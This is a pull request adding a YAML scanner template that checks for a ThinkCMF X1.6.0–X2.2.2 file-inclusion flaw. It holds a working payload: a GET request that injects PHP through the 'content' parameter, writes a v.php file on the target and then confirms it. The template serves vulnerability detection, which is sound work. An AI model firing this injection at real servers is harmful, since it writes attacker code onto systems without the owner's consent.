### PR TITLE
增加thinkcmf文件包含写shell

### DIFF
--- a/pocs/poc-yaml-thinkcmf-content-Inclusion-write-shell.yml
+++ b/pocs/poc-yaml-thinkcmf-content-Inclusion-write-shell.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-thinkcmf-content-Inclusion
+rules:
+  - method: GET
+    path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22v.php%22,%22%3C?php+echo+%27vul%27;%22);"
+    expression: "true"
+  - method: GET
+    path: "/v.php"
+    expression: |
+      status == 200 && body.bcontains(b'vul')
+
+detail:
+  author: violin
+  ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2
+  links:
+    -https://www.freebuf.com/vuls/217586.html


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
thinkcmf通过文件包含写shell
影响版本：
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
## 测试环境
暂无
## 备注
参考链接：https://www.freebuf.com/vuls/217586.html